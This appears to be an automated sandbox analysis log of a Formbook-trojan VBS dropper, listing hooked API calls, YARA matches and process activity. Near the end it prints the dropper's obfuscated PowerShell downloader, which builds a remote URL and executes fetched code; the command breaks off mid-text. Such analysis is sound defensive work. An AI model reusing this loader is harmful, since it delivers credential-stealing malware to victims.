          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542D10 NtMapViewOfSection,18_2_22542D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22543010 NtOpenDirectoryObject,18_2_22543010
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22543D10 NtOpenProcessToken,18_2_22543D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542C00 NtQueryInformationProcess,18_2_22542C00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542D00 NtSetInformationFile,18_2_22542D00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542D30 NtUnmapViewOfSection,18_2_22542D30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542E30 NtWriteVirtualMemory,18_2_22542E30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542F30 NtCreateSection,18_2_22542F30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542AD0 NtReadFile,18_2_22542AD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542DD0 NtDelayExecution,18_2_22542DD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542CC0 NtQueryVirtualMemory,18_2_22542CC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542BF0 NtAllocateVirtualMemory,18_2_22542BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542AF0 NtWriteFile,18_2_22542AF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542CF0 NtOpenProcess,18_2_22542CF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542BE0 NtQueryValueKey,18_2_22542BE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542EE0 NtQueueApcThread,18_2_22542EE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542FE0 NtCreateFile,18_2_22542FE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542F90 NtProtectVirtualMemory,18_2_22542F90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22543090 NtSetValueKey,18_2_22543090
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542B80 NtQueryInformationFile,18_2_22542B80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542E80 NtReadVirtualMemory,18_2_22542E80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542AB0 NtWaitForSingleObject,18_2_22542AB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542DB0 NtEnumerateKey,18_2_22542DB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542FB0 NtResumeThread,18_2_22542FB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_225439B0 NtGetContextThread,18_2_225439B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542BA0 NtEnumerateValueKey,18_2_22542BA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542CA0 NtQueryInformationToken,18_2_22542CA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542EA0 NtAdjustPrivilegesToken,18_2_22542EA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_22542FA0 NtQuerySection,18_2_22542FA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_03C32542 Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,18_2_03C32542
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043535C0 NtCreateMutant,LdrInitializeThunk,22_2_043535C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04354650 NtSuspendThread,LdrInitializeThunk,22_2_04354650
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04353090 NtSetValueKey,LdrInitializeThunk,22_2_04353090
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04354340 NtSetContextThread,LdrInitializeThunk,22_2_04354340
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352C70 NtFreeVirtualMemory,LdrInitializeThunk,22_2_04352C70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352C60 NtCreateKey,LdrInitializeThunk,22_2_04352C60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352CA0 NtQueryInformationToken,LdrInitializeThunk,22_2_04352CA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352D30 NtUnmapViewOfSection,LdrInitializeThunk,22_2_04352D30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352D10 NtMapViewOfSection,LdrInitializeThunk,22_2_04352D10
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352DF0 NtQuerySystemInformation,LdrInitializeThunk,22_2_04352DF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352DD0 NtDelayExecution,LdrInitializeThunk,22_2_04352DD0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352E80 NtReadVirtualMemory,LdrInitializeThunk,22_2_04352E80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352EE0 NtQueueApcThread,LdrInitializeThunk,22_2_04352EE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352F30 NtCreateSection,LdrInitializeThunk,22_2_04352F30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352FB0 NtResumeThread,LdrInitializeThunk,22_2_04352FB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352FE0 NtCreateFile,LdrInitializeThunk,22_2_04352FE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043539B0 NtGetContextThread,LdrInitializeThunk,22_2_043539B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352AF0 NtWriteFile,LdrInitializeThunk,22_2_04352AF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352AD0 NtReadFile,LdrInitializeThunk,22_2_04352AD0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352B60 NtClose,LdrInitializeThunk,22_2_04352B60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352BA0 NtEnumerateValueKey,LdrInitializeThunk,22_2_04352BA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352BF0 NtAllocateVirtualMemory,LdrInitializeThunk,22_2_04352BF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352BE0 NtQueryValueKey,LdrInitializeThunk,22_2_04352BE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04353010 NtOpenDirectoryObject,22_2_04353010
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352C00 NtQueryInformationProcess,22_2_04352C00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352CF0 NtOpenProcess,22_2_04352CF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352CC0 NtQueryVirtualMemory,22_2_04352CC0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04353D10 NtOpenProcessToken,22_2_04353D10
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352D00 NtSetInformationFile,22_2_04352D00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04353D70 NtOpenThread,22_2_04353D70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352DB0 NtEnumerateKey,22_2_04352DB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352E30 NtWriteVirtualMemory,22_2_04352E30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352EA0 NtAdjustPrivilegesToken,22_2_04352EA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352F60 NtCreateProcessEx,22_2_04352F60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352FA0 NtQuerySection,22_2_04352FA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352F90 NtProtectVirtualMemory,22_2_04352F90
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352AB0 NtWaitForSingleObject,22_2_04352AB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352B80 NtQueryInformationFile,22_2_04352B80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021C7730 NtCreateFile,22_2_021C7730
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021C7A20 NtClose,22_2_021C7A20
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021C7B70 NtAllocateVirtualMemory,22_2_021C7B70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021C7890 NtReadFile,22_2_021C7890
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021C7980 NtDeleteFile,22_2_021C7980
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCDB8D22_2_00007FFAACCDB8D2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCDAB262_2_00007FFAACCDAB26
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0473E92814_2_0473E928
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0473F1F814_2_0473F1F8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0473E5E014_2_0473E5E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A87E9718_3_06A87E97
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A87CF718_3_06A87CF7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A87D6718_3_06A87D67
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A87D7718_3_06A87D77
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8554E18_3_06A8554E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8704218_3_06A87042
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A86F5918_3_06A86F59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A9302718_3_06A93027
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A84C6318_3_06A84C63
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_224D3FD518_2_224D3FD5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_224D3FD218_2_224D3FD2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_224D9B8018_2_224D9B80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DF43F22_2_043DF43F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431146022_2_04311460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D244622_2_043D2446
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CE4F622_2_043CE4F6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432053522_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D757122_2_043D7571
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BD5B022_2_043BD5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E059122_2_043E0591
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433C6E022_2_0433C6E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432077022_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434475022_2_04344750
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DF7B022_2_043DF7B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431C7C022_2_0431C7C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D70E922_2_043D70E9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DF0E022_2_043DF0E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF0CC22_2_043CF0CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C022_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BA11822_2_043BA118
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431010022_2_04310100
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F17222_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB16B22_2_043EB16B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0435516C22_2_0435516C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A815822_2_043A8158
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432B1B022_2_0432B1B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E01AA22_2_043E01AA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D81CC22_2_043D81CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043C027422_2_043C0274
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043252A022_2_043252A0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043C12ED22_2_043C12ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433B2C022_2_0433B2C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D132D22_2_043D132D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DA35222_2_043DA352
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430D34C22_2_0430D34C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0436739A22_2_0436739A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432E3F022_2_0432E3F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E03E622_2_043E03E6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04399C3222_2_04399C32
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320C0022_2_04320C00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043C0CB522_2_043C0CB5
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04310CF222_2_04310CF2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DFCF222_2_043DFCF2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432AD0022_2_0432AD00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D7D7322_2_043D7D73
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D1D5A22_2_043D1D5A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04323D4022_2_04323D40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04338DBF22_2_04338DBF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431ADE022_2_0431ADE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433FDC022_2_0433FDC0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DEE2622_2_043DEE26
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320E5922_2_04320E59
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04329EB022_2_04329EB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04332E9022_2_04332E90
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DCE9322_2_043DCE93
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DEEDB22_2_043DEEDB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04340F3022_2_04340F30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04362F2822_2_04362F28
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DFF0922_2_043DFF09
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04394F4022_2_04394F40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DFFB122_2_043DFFB1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321F9222_2_04321F92
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432CFE022_2_0432CFE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04312FC822_2_04312FC8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D80022_2_0438D800
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432284022_2_04322840
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432A84022_2_0432A840
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043068B822_2_043068B8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E8F022_2_0434E8F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043238E022_2_043238E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433696222_2_04336962
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432995022_2_04329950
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433B95022_2_0433B950
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043229A022_2_043229A0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EA9A622_2_043EA9A6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04393A6C22_2_04393A6C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DFA4922_2_043DFA49
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D7A4622_2_043D7A46
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04365AA022_2_04365AA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BDAAC22_2_043BDAAC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431EA8022_2_0431EA80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CDAC622_2_043CDAC6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DFB7622_2_043DFB76
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043DAB4022_2_043DAB40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433FB8022_2_0433FB80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04395BF022_2_04395BF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0435DBF922_2_0435DBF9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D6BD722_2_043D6BD7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021B130022_2_021B1300
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021A112822_2_021A1128
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021AC71022_2_021AC710
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021AA79022_2_021AA790
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021AC4F022_2_021AC4F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021AA8D922_2_021AA8D9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021C9E3022_2_021C9E30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021B2E5022_2_021B2E50
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0438EA12 appears 86 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04355130 appears 36 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04367E54 appears 96 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0439F290 appears 105 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0430B970 appears 265 times
          Source: IMG-466573885783553Folketingsmedlemmers.vbsInitial sample: Strings found which are bigger than 50
          Source: amsi32_7668.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 6600, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@21/8@6/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Metacarpals.TokJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zssdnvgm.y2n.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6600
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7668
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: IMG-466573885783553Folketingsmedlemmers.vbsReversingLabs: Detection: 13%
          Source: IMG-466573885783553Folketingsmedlemmers.vbsVirustotal: Detection: 14%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel 